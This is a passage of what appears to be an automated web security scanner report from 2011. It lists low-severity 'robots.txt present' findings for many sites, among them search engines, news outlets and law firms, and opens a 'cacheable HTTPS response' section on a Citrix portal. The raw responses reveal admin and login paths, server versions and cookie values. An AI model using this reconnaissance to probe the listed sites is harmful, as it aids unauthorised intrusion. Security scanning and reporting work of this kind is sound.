Confidence:   Certain
Host:   http://www.google.com
Path:   /search

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.google.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Mon, 09 May 2011 20:53:07 GMT
Date: Thu, 12 May 2011 16:55:17 GMT
Expires: Thu, 12 May 2011 16:55:17 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...
31.47. https://www.google.com/accounts/ServiceLogin  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.google.com
Path:   /accounts/ServiceLogin

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.google.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Mon, 09 May 2011 20:53:07 GMT
Date: Thu, 12 May 2011 16:55:22 GMT
Expires: Thu, 12 May 2011 16:55:22 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...
31.48. http://www.hartfordbusiness.com/news14300.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hartfordbusiness.com
Path:   /news14300.html

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.hartfordbusiness.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:55:22 GMT
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Thu, 11 Dec 2008 19:24:43 GMT
ETag: "125e5b7-182-45dca541ff4c0"
Accept-Ranges: bytes
Content-Length: 386
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

# This robots.txt file requests that search engines and other
# automated web-agents don't try to index the files in this
# directory (/). This file is required in the event that you
# use OpenX witho
...[SNIP]...
31.49. http://www.howardrice.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.howardrice.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.howardrice.com

Response

HTTP/1.1 200 OK
Content-Length: 38
Content-Type: text/plain
Content-Location: http://www.howardrice.com/robots.txt
Last-Modified: Thu, 17 Feb 2011 18:54:27 GMT
Accept-Ranges: bytes
ETag: "92f71d1ad4cecb1:328c"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 16:09:19 GMT
Connection: close

User-agent: ia_archiver
Disallow: /
31.50. http://www.jdtplaw.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.jdtplaw.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.jdtplaw.com

Response

HTTP/1.1 200 OK
Content-Length: 613
Content-Type: text/plain
Last-Modified: Thu, 12 May 2011 11:05:59 GMT
Accept-Ranges: bytes
ETag: "c11a25939410cc1:764d"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-UA-Compatible: IE=EmulateIE7
Date: Thu, 12 May 2011 16:09:18 GMT
Connection: close
Set-Cookie: BIGipServerFIRMSND13-80=1504003239.20480.0000; path=/

# Prevent Indexing of the following directories by any web spiders
User-agent: *
Disallow: /Admin
Disallow: /Edit
Disallow: /EventRegistration
Disallow: /Includes
Disallow: /Ranking
Disallow: /
...[SNIP]...
31.51. http://www.law.com/jsp/article.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.law.com
Path:   /jsp/article.jsp

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.law.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Mon, 26 Jul 2010 21:54:44 GMT
ETag: "15340fe-1c4-48c516eae5100"
Accept-Ranges: bytes
Content-Length: 452
Content-Type: text/plain; charset=UTF-8
New_Hostname: /robots.txt@
New_Hostname: /robots.txt@
New_Hostname: /robots.txt@
New_Hostname: /robots.txt@
New_Hostname: /robots.txt@
New_Hostname: /robots.txt@
Date: Thu, 12 May 2011 16:55:24 GMT
Connection: close

User-agent: *
Crawl-delay: 10
Robot-version: 2.0
Request-rate: 1/10s
Visit-time: 0600-1045
Disallow: /images/
Disallow: /cgi-bin/

User-agent: Googlebot
Disallow: /*.jpg$
Disallow: /*.gif$

User-agent
...[SNIP]...
31.52. http://www.letipli.com/member_details.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.letipli.com
Path:   /member_details.asp

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.letipli.com

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
MicrosoftOfficeWebServer: 5.0_Pub
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l on "2005.03.25T13:09-0500" exp "2006.03.25T12:00-0500" r (v 0 s 0 n 0 l 0))
Date: Thu, 12 May 2011 17:02:20 GMT
Content-Type: text/plain
Accept-Ranges: bytes
Last-Modified: Fri, 06 May 2011 23:53:20 GMT
ETag: "5cb130c748ccc1:9f3"
Content-Length: 247

User-agent: * # directed to all spiders
Disallow: /_*
Disallow: /admin2/
Disallow: /asp_rk/
Disallow: /aspnet_client/
Disallow: /data/
Disallow: /errors/
Disallow: /images/
Disallow: /media/
...[SNIP]...
31.53. http://www.linkedin.com/companies/peck-shaffer-&-williams  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.linkedin.com
Path:   /companies/peck-shaffer-&-williams

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.linkedin.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Accept-Ranges: bytes
ETag: "-991542871"
Last-Modified: Wed, 06 Apr 2011 03:23:57 GMT
Content-Length: 24473
Connection: keep-alive
Date: Thu, 12 May 2011 16:55:27 GMT
Server: lighttpd

# Notice: If you would like to crawl LinkedIn,
# please email whitelistcrawl@linkedin.com to apply
# for white listing.

User-agent: Googlebot
Disallow: /addContacts*
Disallow: /addressBookExport*
D
...[SNIP]...
31.54. http://www.marketwatch.com/news/story/therese-polettis-tech-tales-ebay/story.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.marketwatch.com
Path:   /news/story/therese-polettis-tech-tales-ebay/story.aspx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.marketwatch.com

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/plain
Expires: -1
Last-Modified: Fri, 22 Oct 2010 21:42:02 GMT
Accept-Ranges: bytes
ETag: "0b137f63172cb1:0"
Server: Microsoft-IIS/7.5
X-MACHINE: sbkdfpswebp01
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 16:55:27 GMT
Connection: keep-alive
Content-Length: 1999

User-agent: *
Disallow: /3com/
Disallow: /admin/
Disallow: /archive/
Disallow: /bin/
Disallow: /cgi-bin/
Disallow: /data/
Disallow: /dbcfiles/
Disallow: /dhtml/
Disallow: /dhtmlmenu/
Disallo
...[SNIP]...
31.55. http://www.memberize.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.memberize.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.memberize.com

Response

HTTP/1.1 200 OK
Content-Length: 604
Content-Type: text/plain
Content-Location: http://www.memberize.com/robots.txt
Last-Modified: Thu, 18 Sep 2008 07:00:00 GMT
Accept-Ranges: bytes
ETag: "058a62a5c19c91:869"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 18:09:30 GMT
Connection: close

...# /robots.txt file for http://www.memberize.com

User-agent: *
Disallow: /video/
Disallow: /clubportal/cart/
Disallow: /clubportal/library/
Disallow: /clubportal/includes/
Disallow: /clubpor
...[SNIP]...
31.56. http://www.microsoft.com/ContentRedirect.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.microsoft.com
Path:   /ContentRedirect.asp

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.microsoft.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=900
Content-Type: text/plain
Last-Modified: Thu, 28 Apr 2011 19:16:34 GMT
Accept-Ranges: bytes
ETag: "bbaa95c9d85cc1:0"
Server: Microsoft-IIS/7.5
VTag: 791804430600000000
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 16:55:39 GMT
Connection: keep-alive
Content-Length: 12574

...# Robots.txt file for http://www.microsoft.com
#

User-agent: *
Disallow: /*TOCLinksForCrawlers*
Disallow: /*/mac/help.mspx
Disallow: /*/mac/help.mspx?
Disallow: /*/mactopia/help.mspx?
Disa
...[SNIP]...
31.57. http://www.milbank.com/en  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.milbank.com
Path:   /en

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.milbank.com

Response

HTTP/1.1 200 OK
Content-Length: 157
Content-Type: text/plain
Last-Modified: Tue, 05 Aug 2008 14:07:46 GMT
Accept-Ranges: bytes
ETag: "f73eaa24f7c81:23a"
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 16:09:29 GMT
Connection: close

# Exclusions for milbank.com

# User-agent: *
# Disallow: /en/NewsEvents/RecentPressRel/Milbank_Advises_Genomma_Lab_Internacional_on_234_Million_IPO.htm
31.58. http://www.milbanktweed.org/GENERAL/Extranet.nsf/ClientLogin  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.milbanktweed.org
Path:   /GENERAL/Extranet.nsf/ClientLogin

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.milbanktweed.org

Response

HTTP/1.1 200 OK
Server: Lotus-Domino
Date: Thu, 12 May 2011 16:56:11 GMT
Connection: close
Content-Type: text/plain
Content-Length: 2210
Last-Modified: Fri, 11 Feb 2011 16:45:51 GMT
Accept-Ranges: bytes

# robots.txt for www.milbanktweed.org

User-agent: *

Allow: /AandP
Allow: /Lehman
Allow: /LocalInsightMedia
Allow: /SeaLaunch

Sitemap: http://apteacreditors.com/sitemap_index.xml
Sitemap:
...[SNIP]...
31.59. http://www.njbiz.com/article.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.njbiz.com
Path:   /article.asp

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.njbiz.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Thu, 14 Dec 2006 16:14:15 GMT
Accept-Ranges: bytes
ETag: "a4a263e69a1fc71:0"
Server: Microsoft-IIS/7.0
Date: Thu, 12 May 2011 16:43:56 GMT
Content-Length: 26
Age: 717
X-Cache: HIT from sxsquid02
X-Cache-Lookup: HIT from sxsquid02:80
Via: 1.0 sxsquid02 (squid/3.0.STABLE18)
Connection: close

User-agent: *
Disallow: /
31.60. http://www.nldhlaw.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nldhlaw.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.nldhlaw.com

Response

HTTP/1.1 200 OK
Content-Length: 669
Content-Type: text/plain
Last-Modified: Thu, 12 May 2011 11:01:00 GMT
Accept-Ranges: bytes
ETag: "944bf6e09310cc1:a29e"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-UA-Compatible: IE=EmulateIE7
Date: Thu, 12 May 2011 16:09:07 GMT
Connection: close
Set-Cookie: BIGipServerFIRMSND07-80=272686346.20480.0000; path=/

# Prevent Indexing of the following directories by any web spiders
User-agent: *
Disallow: /Admin
Disallow: /Edit
Disallow: /EventRegistration
Disallow: /Includes
Disallow: /Ranking
Disallow: /
...[SNIP]...
31.61. http://www.npr.org/templates/story/story.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.npr.org
Path:   /templates/story/story.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.npr.org

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Wed, 21 Jul 2004 21:14:03 GMT
ETag: "ee-3dfc0e1ac1cc0"
Accept-Ranges: bytes
Cache-Control: max-age=0
Expires: Thu, 05 May 2011 20:09:42 GMT
Keep-Alive: timeout=10, max=4993
Content-Type: text/plain
Connection: close
Date: Thu, 12 May 2011 16:55:53 GMT
Age: 123
Content-Length: 238

User-agent: *
Disallow: /cgi-bin
Disallow: /ramfiles/
Disallow: /*.smil
Disallow: /*.asx
Disallow: /*.ram
Disallow: /*.rmm
Disallow: /*.js
Disallow: /*.au
Disallow: /stations/force/force_localization.
...[SNIP]...
31.62. http://www.nytimes.com/reuters/2009/11/30/arts/entertainment-us-golf-woods.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nytimes.com
Path:   /reuters/2009/11/30/arts/entertainment-us-golf-woods.html

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.nytimes.com

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Thu, 12 May 2011 16:55:57 GMT
Content-length: 637
Content-type: text/plain
Set-cookie: RMID=2637e37a002e4dcc111d29ae; expires=Friday, 11-May-2012 16:55:57 GMT; path=/; domain=.nytimes.com
Last-modified: Mon, 26 Apr 2010 17:28:40 GMT
Accept-ranges: bytes
Connection: keep-alive

User-agent: *
Allow: /ads/public/
Disallow: /ads/
Disallow: /adx/bin/
Disallow: /aponline/
Disallow: /archives/
Disallow: /auth/
Disallow: /cnet/
Disallow: /college/
Disallow: /external/
Disallow: /fi
...[SNIP]...
31.63. http://www.orangecountyala.org/clubportal/ocala/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.orangecountyala.org
Path:   /clubportal/ocala/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.orangecountyala.org

Response

HTTP/1.1 200 OK
Content-Length: 604
Content-Type: text/plain
Content-Location: http://www.orangecountyala.org/robots.txt
Last-Modified: Thu, 18 Sep 2008 07:00:00 GMT
Accept-Ranges: bytes
ETag: "058a62a5c19c91:869"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 18:11:53 GMT
Connection: close

...# /robots.txt file for http://www.memberize.com

User-agent: *
Disallow: /video/
Disallow: /clubportal/cart/
Disallow: /clubportal/library/
Disallow: /clubportal/includes/
Disallow: /clubpor
...[SNIP]...
31.64. http://www.perkinscoie.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.perkinscoie.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.perkinscoie.com

Response

HTTP/1.1 200 OK
Content-Length: 706
Content-Type: text/plain
Last-Modified: Mon, 21 Jun 2010 18:12:27 GMT
Accept-Ranges: bytes
ETag: "8eeb3e4e6d11cb1:afa4"
Server: Microsoft-IIS/6.0
X-UA-Compatible: IE=EmulateIE7
x-geoloc: 02
x-client: 000881
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A67
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 16:10:19 GMT
Connection: close
Set-Cookie: NSC_MC_QbvmXfjtt_IUUQ=ffffffff09d5f65f45525d5f4f58455e445a4a423660;path=/

# STANDARD
User-agent: *
Disallow: /fc/
Disallow: /FirmConnect.aspx
Disallow: /Login.aspx
Disallow: /Logout.aspx
Disallow: /32/
Disallow: /1/
Disallow: /2/
Disallow: /3/
Disallow: /64/
Disa
...[SNIP]...
31.65. http://www.pillsburylaw.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pillsburylaw.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.pillsburylaw.com

Response

HTTP/1.1 200 OK
Content-Length: 186
Content-Type: text/plain
Content-Location: http://www.pillsburylaw.com/robots.txt
Last-Modified: Tue, 23 Mar 2010 16:27:52 GMT
Accept-Ranges: bytes
ETag: "81113c9a5caca1:b91"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 16:09:22 GMT
Connection: close

User-agent: *
Disallow: /admin/
Disallow: /mobile/
Disallow: /pdf.cfm
Disallow: /topdf.cfm
Disallow: /vcard.cfm
Disallow: /printfriendly.cfm
sitemap: web_sitemap_c3564d4c.xml.gz
31.66. https://www.pillsburylaw.com/index.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.pillsburylaw.com
Path:   /index.cfm

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.pillsburylaw.com

Response

HTTP/1.1 200 OK
Content-Length: 186
Content-Type: text/plain
Content-Location: https://www.pillsburylaw.com/robots.txt
Last-Modified: Tue, 23 Mar 2010 16:27:52 GMT
Accept-Ranges: bytes
ETag: "81113c9a5caca1:b91"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 16:58:19 GMT
Connection: close

User-agent: *
Disallow: /admin/
Disallow: /mobile/
Disallow: /pdf.cfm
Disallow: /topdf.cfm
Disallow: /vcard.cfm
Disallow: /printfriendly.cfm
sitemap: web_sitemap_c3564d4c.xml.gz
31.67. http://www.porterwright.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.porterwright.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.porterwright.com

Response

HTTP/1.1 200 OK
Content-Length: 107
Content-Type: text/plain
Last-Modified: Fri, 02 Jan 2009 18:48:56 GMT
Accept-Ranges: bytes
ETag: "05cdec3a6dc91:afa4"
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000896
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A67
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 16:10:19 GMT
Connection: close
Set-Cookie: NSC_MC_QbvmXfjtt_IUUQ=ffffffff09d5f65f45525d5f4f58455e445a4a423660;path=/

User-agent: *
Disallow: /fc/
Disallow: /FirmConnect.aspx
Disallow: /Login.aspx
Disallow: /Logout.aspx
31.68. http://www.powelltrachtman.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.powelltrachtman.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.powelltrachtman.com

Response

HTTP/1.1 200 OK
Content-Length: 621
Content-Type: text/plain
Last-Modified: Thu, 12 May 2011 11:08:36 GMT
Accept-Ranges: bytes
ETag: "b48b1f09410cc1:7308"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-UA-Compatible: IE=EmulateIE7
Date: Thu, 12 May 2011 16:08:49 GMT
Connection: close
Set-Cookie: BIGipServerFIRMSND13-80=423943434.20480.0000; path=/

# Prevent Indexing of the following directories by any web spiders
User-agent: *
Disallow: /Admin
Disallow: /Edit
Disallow: /EventRegistration
Disallow: /Includes
Disallow: /Ranking
Disallow: /
...[SNIP]...
31.69. http://www.semmes.com/attorney_search.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.semmes.com
Path:   /attorney_search.asp

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.semmes.com

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 16:02:43 GMT
Content-Type: text/plain
Accept-Ranges: bytes
Last-Modified: Fri, 06 Jul 2007 14:33:17 GMT
ETag: "92e4d98dabfc71:1031"
Content-Length: 912

#====================
# NO ACCESS BOT LIST
#====================

# NO access (e-collector)
User-agent: ecollector
User-agent: GenCrawler
User-agent: Internet Cruiser Robot
User-agent: jcrawle
...[SNIP]...
31.70. http://www.sleepertechnologies.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sleepertechnologies.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.sleepertechnologies.com

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 16:58:41 GMT
Content-Type: text/plain
Accept-Ranges: bytes
Last-Modified: Mon, 20 Dec 2010 15:57:49 GMT
ETag: "908adfa65ea0cb1:1031"
Content-Length: 2027

#====================
# NO ACCESS BOT LIST
#====================

# NO access (e-collector)
User-agent: ecollector
User-agent: GenCrawler
User-agent: Internet Cruiser Robot
User-agent: jcrawle
...[SNIP]...
31.71. http://www.stumbleupon.com/hostedbadge.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.stumbleupon.com
Path:   /hostedbadge.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.stumbleupon.com

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Thu, 27 Jan 2011 22:52:51 GMT
Keep-Alive: timeout=30, max=100
Content-Type: text/plain; charset=iso-8859-1
Content-Length: 1962
Date: Thu, 12 May 2011 20:19:34 GMT
Age: 0
Via: 1.1 varnish
Connection: close

Sitemap: http://stumbleupon.com/sitemap.blogA_index.xml
Sitemap: http://stumbleupon.com/sitemap.blogB_index.xml
Sitemap: http://stumbleupon.com/sitemap.review_index.xml
Sitemap: http://stumbleupon.com
...[SNIP]...
31.72. http://www.superlawyers.com/redir  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.superlawyers.com
Path:   /redir

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.superlawyers.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 18:35:34 GMT
Server: Apache/2.2
Last-Modified: Fri, 18 Sep 2009 17:13:00 GMT
ETag: "ac8004-47-473dd3e7a1f00"
Accept-Ranges: bytes
Content-Length: 71
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

# Allow all
User-agent: *
Disallow:

User-Agent: msnbot
Crawl-Delay: 2
31.73. http://www.usatoday.com/money/autos/2009-04-20-gm-dealers-bankruptcy_N.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.usatoday.com
Path:   /money/autos/2009-04-20-gm-dealers-bankruptcy_N.htm

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.usatoday.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Fri, 24 Sep 2010 18:31:30 GMT
Accept-Ranges: bytes
ETag: "0eda5b4165ccb1:0"
Server: Microsoft-IIS/7.5
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Date: Thu, 12 May 2011 16:59:25 GMT
Connection: close
Content-Length: 1660

# robots.txt for http://www.usatoday.com
sitemap: http://www.usatoday.com/USAToday_sitemap.xml
User-agent:*
Disallow:/feedback
Disallow:/HTML
Disallow:/html
Disallow:/cgi-bin
Disallow:/system

...[SNIP]...
31.74. http://www.vault.com/wps/portal/usa/companies/company-profile/Perkins-Coie-LLP  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vault.com
Path:   /wps/portal/usa/companies/company-profile/Perkins-Coie-LLP

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.vault.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:59:31 GMT
Server: IBM_HTTP_Server
Last-Modified: Thu, 14 Apr 2011 16:16:45 GMT
ETag: "9e38bc-152-40619540"
Accept-Ranges: bytes
Content-Length: 338
Vary: Accept-Encoding,User-Agent
Keep-Alive: timeout=10, max=74
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6e45525d5f4f58455e445a4a423660;expires=Thu, 12-May-2011 17:25:15 GMT;path=/

User-Agent: *
Disallow: /wps/myportal/
Disallow: /wps/portal/na/
Disallow: /wps/portal/asea/
Disallow: /wps/portal/careerinsider/
Disallow: /styles/
Disallow: /scripts/
Disallow: /images/pdf/
Dis
...[SNIP]...
31.75. http://www.washingtonpost.com/wp-dyn/content/article/2009/06/17/AR2009061701900.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.washingtonpost.com
Path:   /wp-dyn/content/article/2009/06/17/AR2009061701900.html

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.washingtonpost.com

Response

HTTP/1.0 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Fri, 22 Apr 2011 23:10:56 GMT
Content-Type: text/plain; charset=UTF-8
X-Cnection: close
Cache-Control: must-revalidate, max-age=581
Date: Thu, 12 May 2011 16:59:53 GMT
Content-Length: 1142
Connection: close

User-agent: ia_archiver
Disallow: /

User-agent: *
Crawl-delay: 1

# Disallow facets
Disallow: /*_print.html
Disallow: /*_email.html
Disallow: /*_singlePage.html
Disallow: /*_allComments.htm
...[SNIP]...
31.76. http://www.weblinedesigns.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.weblinedesigns.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.weblinedesigns.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 19:35:55 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0d mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.8.9
Last-Modified: Fri, 30 Jul 2010 18:30:47 GMT
ETag: "b36e2f-18-48c9f0caa03c0"
Accept-Ranges: bytes
Content-Length: 24
Connection: close
Content-Type: text/plain

User-agent: *
Allow: /

31.77. http://www.wi-ala.org/ClubPortal/wala/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wi-ala.org
Path:   /ClubPortal/wala/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.wi-ala.org

Response

HTTP/1.1 200 OK
Content-Length: 604
Content-Type: text/plain
Content-Location: http://www.wi-ala.org/robots.txt
Last-Modified: Thu, 18 Sep 2008 07:00:00 GMT
Accept-Ranges: bytes
ETag: "058a62a5c19c91:869"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 18:09:23 GMT
Connection: close

...# /robots.txt file for http://www.memberize.com

User-agent: *
Disallow: /video/
Disallow: /clubportal/cart/
Disallow: /clubportal/library/
Disallow: /clubportal/includes/
Disallow: /clubpor
...[SNIP]...
32. Cacheable HTTPS response  previous  next
There are 6 instances of this issue:

Issue description

Unless directed otherwise, browsers may store a local cached copy of content received from web servers. Some browsers, including Internet Explorer, cache content accessed via HTTPS. If sensitive information in application responses is stored in the local cache, then this may be retrieved by other users who have access to the same computer at a future time.

Issue remediation

The application should return caching directives instructing browsers not to store local copies of any sensitive data. Often, this can be achieved by configuring the web server to prevent caching for relevant paths within the web root. Alternatively, most web development platforms allow you to control the server's caching directives from within individual scripts. Ideally, the web server should return the following HTTP headers in all responses containing sensitive content:

32.1. https://citrix.howardrice.com/Citrix/AccessPlatform/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://citrix.howardrice.com
Path:   /Citrix/AccessPlatform/

Request

GET /Citrix/AccessPlatform/ HTTP/1.1
Host: citrix.howardrice.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://citrix.howardrice.com/
Cookie: __utma=146441517.1620441990.1305216561.1305216561.1305216561.1; __utmb=146441517.5.10.1305216561; __utmc=146441517; __utmz=146441517.1305216561.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Howard%20Rice%20Nemerovski%20Canady%20Falk%20%26%20Rabkin; __utmv=

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:13:51 GMT
Server: Microsoft-IIS/6.0
Content-Length: 715
Content-Type: text/html
Content-Location: https://citrix.howardrice.com/Citrix/AccessPlatform/Default.htm
Last-Modified: Fri, 19 Oct 2007 18:24:22 GMT
Accept-Ranges: bytes
ETag: "75cf2d457d12c81:10b2"
X-Powered-By: ASP.NET

...<!--
default.htm
Copyright (c) 2000 - 2007 Citrix Systems, Inc. All Rights Reserved.
Web Interface 4.6.0.18291
